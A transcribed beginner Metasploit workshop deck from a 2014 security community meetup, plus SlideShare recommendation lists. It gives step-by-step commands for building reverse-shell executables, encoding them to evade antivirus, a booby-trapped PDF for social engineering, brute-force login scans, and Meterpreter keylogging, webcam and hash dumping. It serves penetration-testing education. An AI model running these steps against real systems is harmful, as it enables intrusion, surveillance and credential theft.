SlideShare a Scribd company logo

Metasploit Humla for Beginner

n|u - The Open Security Community
n|u - The Open Security Community

null Bangalore Chapter - June 28th 2014 Humla

EducationTechnology
1 of 74
Download to read offline
By : Ajay Srivastava
Please don’t expect ….  How to evade antiviruses (antivirus evasion)  How to do pivoting  How to do port forwarding  How to write your own metasploit module
Disclaimer All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.
Agenda  Introduction  Basics of Metasploit  Information gathering  Exploitation  ( 11:30-11:45 - Break 1/ Tea )*  Meterpreter Basics  Post exploitation using meterpreter  Meterpeter scripts  ( 1:00 – 2:00 - Break 2 / Lunch )*
Agenda  Metasploit utilities  Client-side exploitation  ( 4:00-4:20 – Break 3 / Tea )*  Auxiliary module  And we are done   * Lunch and Tea are self sponsored.
Introduction  It’s not a Tool, it’s a Framework !!!
History  Developed by H.D Moore in 2003  Originally written in Perl & later on rewritten in Ruby  Acquired by Rapid7 in 2009  Remains open source & free for use
Metasploit Architecture
Libraries  Rex :  The basic library for most tasks  Handles sockets and protocols  MSF CORE :  Defines the Metasploit Framework  Provides the ‘basic’ API  MSF BASE :  Provides the ‘friendly’ API  Provides simplified APIs for use in the Framework
Modules  Exploit  Modules used for actually attacking the systems and grabbing the access.  Payload  Piece of code which executes on remote system after successful exploitation.  Auxiliary  Exploit without payload. Used for scanning, fuzzing & doing various tasks.
Modules  Encoders  Program which encodes our payload to avoid antivirus detection  Nops  Used to keep payload size consistent
Payloads  Single  Completely standalone  eg: Add user  Stagers  Creates the network connection  Stages  Downloaded by the stagers  eg: Meterpreter
Payloads  Payload is staged if represented by ‘/’ in the payload name  Windows/shell_bind_tcp  single payload with no stage  Windows/shell/bind_tcp  a stager (bind_tcp)  a stage (shell)
Interfaces  MSFCONSOLE  MSFCLI  MSFWEB  Armitage
MSFCONSOLE  Most powerful interface among all interfaces
MSFCLI
MSFWEB
Armitage  Graphical version of Metasploit  Developed by Raphel Mudge  Supports both GUI & CLI
Armitage
Basics Commands  #msfconsole  #msfupdate  MSFConsole commands are classified in two types :  Core Commands  Database commands
Core Commands  help or ?  banner  version  show  search  msf>search <module name>  info  msf>info <module name>  use  msf>use <exploit/auxiliary name>
Core Commands  back  show options  set  msf>set <option> <value>  setg  msf>set <option> <value>  unset  msf>set <option> <value>  unsetg  msf>set <option> <value>
Core Commands  show payloads  set payload  msf>set payload <payload name>  check  exploit  run
Database Commands  Default database : PostgreSQL  Database.yml  /opt/metasploit/apps/pro/ui/config/database.yml  # cat database.yml  db_status  db_disconnect
Database Commands  Db_connect #db_connect user:pass@localhost:port/dbname OR #db_connect –y <path of database.yml>
Database Commands  db_nmap  # db_nmap –sV –A –O <ip range>  hosts  # hosts –h  services  # services
Database Commands  vulns  db_export  db_import  db_rebuild_cache  creds  db_load  db_unload
Information Gathering  Auxiliary modules are the best !!!  Will cover in detail later  Using auxiliary/scanner/portscan/tcp  # msf>auxiliary/scanner/portscan/tcp Or  nmap <switches> <ip address>
Exploitation  To list available exploits :  msf> search <exploit name>  To select an exploit :  msf> use <exploit name>  To get information about selected exploits  msf/exploitname> info  To check the options and set arguments  msf/exploitname> show options  To set the target host  msf/exploitname> set rhost <victim ip>
Exploitation  To list supported payload with selected exploit  msf/exploitname> show payloads  To set the payload  msf/exploitname> set payload <payload name>  To set attacker machine  msf/exploitname> Set lhost <own ip>  To check if target is vuln to selected exploit  msf/exploitname> Check  To launch the attack  msf/exploitname> exploit
Meterpreter  Post exploitation module  Runs in the exploited process context  Runs in memory and doesn’t create any file on disk  Encrypted communication  Stable and extensible
Meterpreter  Classification  Core commands  File system commands  System commands  User interface commands  Priv commands  Networking commands
Meterpreter : Core commands  background  sessions  ps  migrate  bgrun/bglist/bgkill  resource
Meterpreter : Core commands  Run  #msf>run <script name>  Channel  #msf>execute –f <program> -c  Use  #msf>use <extension name>
Meterpreter:File System Commands  pwd  cd  getlwd/getlcd  ls  cat/edit  download/upload
Meterpreter:File System Commands  search  #msf>search –d <directory> -f *.<fileformat> -r  mkdir/rmdir  rm/rmdir  del
Meterpreter : System Commands  sysinfo  getpid/getuid  shell  reboot  shutdown  ps
Meterpreter : UI Commands  User interface & Webcam commands  idletime  keyscan_start  keyscan_dump  keyscan_stop  webcam_list  webcam_snap
Meterpreter : Privs Commands  getsystem  hashdump  timestomp  timestomp –h  timestomp <filepath> -v { to display all atributes}  timestomp <filepath> -c <MM/DD/YYYY H:M:S>
Meterpreter: Networking commands  arp  ipconfig/ifconfig  netstat  route  portfwd
Meterpreter scripts  Path :  /usr/share/metasploit-framework/scripts/meterpreter  Or  meterpreter>run <tab multiple times>
Meterpreter scripts run <script name>  run checkvm  run credcollect  run keylogrecorder  run winenum  run getcountermeasure  run getgui
Meterpreter scripts  run scraper  run hostedit  run gettelnet  run arpscanner  run vnc  run filecollector  #msf>run filecollector –d <dnm> -f *.txt -r
Metasploit Utilities  Three main utilities to generate shellcode and to evade antiviruses  Msfpayload  Msfencode  Msfvenom
Msfpayload  To generate payload in different formats as exe ,C , Ruby and javascript  Using msfpayload :  root@kali:~# msfpayload -h  To check options  root@kali:~# msfpayload <payload name> O  root@:~# msfpayload windows/meterpreter/reverse_tcp O  Setting the options  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe  Sending this exploit.exe to victim
Using Mutli-handler Exploit / setting listener  Setup listner:  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  msf exploit(handler) > show options  msf exploit(handler) > set lhost <attacker ip>  msf exploit(handler) > set lport 4422  msf exploit(handler) > exploit
MSFEncode  To bypass antiviruses  Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.  Payload is encoded by different encoders
MSFEncode  root@kali:~# msfencode -h  Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>  OPTIONS:  -e <opt> The encoder to use  -c <opt> The number of times to encode the data  -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe  -x <opt> Specify an alternate executable template  -k Keep template working; run payload in new thread (use with -x)
MSFEncode  list encoders:  root@kali:~# msfencode –l  msfencode with msfpayload:  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
Client-side Attacks  Difficult to find server-side vulnerabilities  Most enterprises have incoming connections locked down with firewalls  Client-side attacks are the most common ones: - Browser based attacks - Social engineering attacks using malicious link or file
Client-side Attacks:Browser based  Using IE 6 based Aurora exploit  msf > search aurora  msf > use exploit/windows/browser/ms10_002_aurora  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set srvhost <attacker ip>  msf exploit(ms10_002_aurora) > set srvport 80  msf exploit(ms10_002_aurora) > set uripath /test
Client-side Attacks:Browser based  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set lhost <own ip>  msf exploit(ms10_002_aurora) > set lport 443  msf exploit(ms10_002_aurora) > exploit
Client-side Attacks:File Format  Nowadays file format based exploits are exploiting targets in wild.  File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it.  For eg:  Adobe util.printf() Bufferoverflow vulnerability  MS14-017 Microsoft Word RTF Object Confusion
Client-side Attacks:File Format  Exploiting Adobe util.printf() Bufferoverflow vulnerability  msf > search adobe_utilprintf  msf > use exploit/windows/fileformat/adobe_utilprintf  msf exploit(adobe_utilprintf) > set filename resume.pdf  msf exploit(adobe_utilprintf) > show options  msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
Client-side Attacks:File Format  msf exploit(adobe_utilprintf) > setg lhost <attacker ip>  msf exploit(adobe_utilprintf) > set lport 443  msf exploit(adobe_utilprintf) > exploit  Setup listener(i.e multi/handler)  Send this resume.pdf using some social engineering techniques.
Client-side Attacks:File Format  Setting up listener on local machine :  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > show options  msf exploit(handler) > set lhost <own ip>  msf exploit(handler) > set lport 443  msf exploit(handler) > exploit
Auxiliary Modules  Pre-exploitation module  Port scanners, fuzzers, banner grabbers, brute-force module etc.  Path:  /usr/share/metasploit-framework/modules/auxiliary or  Using show auxiliary on msfconsole :  msf > show auxiliary  Used without payloads
Auxiliary Modules  Used same as exploits but without payload  msf> use <auxiliary name>  ‘run’ command instead of ‘exploit’ command  RHOSTS instead of RHOST
Auxiliary Modules : Port scanners  Portscanner auxiliary module used for port scanning  Using portscanners :  msf > search portscan  msf > use auxiliary/scanner/portscan/tcp  msf auxiliary(tcp) > show options  msf auxiliary(tcp) > set rhosts <target>  msf auxiliary(tcp) > set ports 1-100  msf auxiliary(tcp) > set threads 10  msf auxiliary(tcp) > run
Auxiliary Modules : SMB version fingerprinting  msf > search smb_version  msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > show options  msf auxiliary(smb_version) > set rhosts 192.168.37.0/24  msf auxiliary(smb_version) > set threads 10  msf auxiliary(smb_version) > run
Auxiliary Modules : Version Scanner  Banner grabbing of MySQL server :  msf > search MySQL  msf > use auxiliary/scanner/mysql/mysql_version  msf auxiliary(mysql_version) > show options  msf auxiliary(mysql_version) >set rhosts <target>  msf auxiliary(mysql_version) > run
Auxiliary Modules: Login Scanners  Testing login attack on MySQL :  msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options  msf auxiliary(mysql_login) > setg rhosts <target>  msf auxiliary(mysql_login) > set user_file userfile.txt
Auxiliary Modules: Login Scanners  msf auxiliary(mysql_login) > set pass_file passfile.txt  msf auxiliary(mysql_login) > set stop_on_success true  msf auxiliary(mysql_login) > run
Auxiliary Modules : Telnet  msf > search telnet_login  msf > use auxiliary/scanner/telnet/telnet_login  msf auxiliary(telnet_login) > show options  msf auxiliary(telnet_login)) > setg rhosts <target ip>  msf auxiliary(telnet_login) > set user_file userfile.txt
Auxiliary Modules : Telnet  msf auxiliary(telnet_login) > set pass_file passfile.txt  msf auxiliary(telnet_login) > set stop_on_success true  msf auxiliary(telnet_login) > run  Verify:  root@kali:~# telnet <target ip>
Auxiliary Modules : Attacking FTP  msf > search ftp_version  msf > use auxiliary/scanner/ftp/ftp_version  msf auxiliary(ftp_version) > show options  msf auxiliary(ftp_version) > set rhosts <target>  msf auxiliary(ftp_version) > run  Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)
Auxiliary Modules : Attacking FTP  Now checking for ftp login  msf > search ftp_login  msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary(ftp_login) > set rhosts <target ip>  msf auxiliary(ftp_login) > set user_file userfile.txt  msf auxiliary(ftp_login) > set pass_file passfile.txt  msf auxiliary(ftp_login) > set stop_on_success true  msf auxiliary(ftp_login) > run  Successful FTP login for 'msfadmin':'msfadmin'
Auxiliary Modules : Attacking FTP  From FTP version scan we know its version is vsFTPd 2.3.4  Now looking for exploit of this FTP version  msf > search vsFTPd 2.3.4  msf > use exploit/unix/ftp/vsftpd_234_backdoor  msf exploit(vsftpd_234_backdoor) > show options  msf exploit(vsftpd_234_backdoor) > set rhost <target ip>  msf exploit(vsftpd_234_backdoor) > show payloads  msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact  msf exploit(vsftpd_234_backdoor) > exploit
References  Metasploit Guide, http://packetstormsecurity.com/files/119280,  Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)  Metasploit Unleashed ,  http://www.offensive-security.com/metasploit- unleashed/Main_Page
Metasploit Humla for Beginner

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Metasploit
MetasploitMetasploit
MetasploitInstitute of Information Security (IIS)
 
Örnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu EngellemeÖrnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu EngellemeBGA Cyber Security
 
Firewall ppt
Firewall pptFirewall ppt
Firewall pptsaloni mittal
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
Mininet introduction
Mininet introductionMininet introduction
Mininet introductionVipin Gupta
 

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Metasploit
MetasploitMetasploit
MetasploitInstitute of Information Security (IIS)
 
Örnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu EngellemeÖrnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu EngellemeBGA Cyber Security
 
Firewall ppt
Firewall pptFirewall ppt
Firewall pptsaloni mittal
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
Mininet introduction
Mininet introductionMininet introduction
Mininet introductionVipin Gupta
 
NMap
NMapNMap
NMapPritesh Raka
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitableMohammed Akbar Shariff
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning Viren Rao
 
Burpsuite 101
Burpsuite 101Burpsuite 101
Burpsuite 101n|u - The Open Security Community
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorialVarun Kakumani
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıBGA Cyber Security
 
Metasploitable
MetasploitableMetasploitable
MetasploitableSri Manakula Vinayagar Engineering College
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceEr. Shiva K. Shrestha
 
from Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain Worksfrom Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain WorksNational Cheng Kung University
 
Linux Device Tree
Linux Device TreeLinux Device Tree
Linux Device Tree艾鍗科技
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
PACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPace IT at Edmonds Community College
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaPRISMA CSI
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAPPhannarith Ou, G-CISO
 
Burp suite
Burp suiteBurp suite
Burp suiteSOURABH DESHMUKH
 
Iptables presentation
Iptables presentationIptables presentation
Iptables presentationEmin Abdul Azeez
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: MetasploitKasper de Waard
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 

More Related Content

What's hot

Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning Viren Rao
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıBGA Cyber Security
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceEr. Shiva K. Shrestha
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaPRISMA CSI
 

What's hot (20)

NMap
NMapNMap
NMap
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning
 
Burpsuite 101
Burpsuite 101Burpsuite 101
Burpsuite 101
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorial
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım Kitapçığı
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
from Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain Worksfrom Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain Works
 
Linux Device Tree
Linux Device TreeLinux Device Tree
Linux Device Tree
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
PACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless Attacks
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Iptables presentation
Iptables presentationIptables presentation
Iptables presentation
 

Similar to Metasploit Humla for Beginner

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal PanchmahalkarPrajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsMeenalJabde
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with MonitOSOCO
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 

Similar to Metasploit Humla for Beginner (20)

Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Dev ops
Dev opsDev ops
Dev ops
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix Commands
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with Monit
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904
 

Recently uploaded

Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxcallscotland1987
 
FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024Elizabeth Walsh
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxAmanpreet Kaur
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSCeline George
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
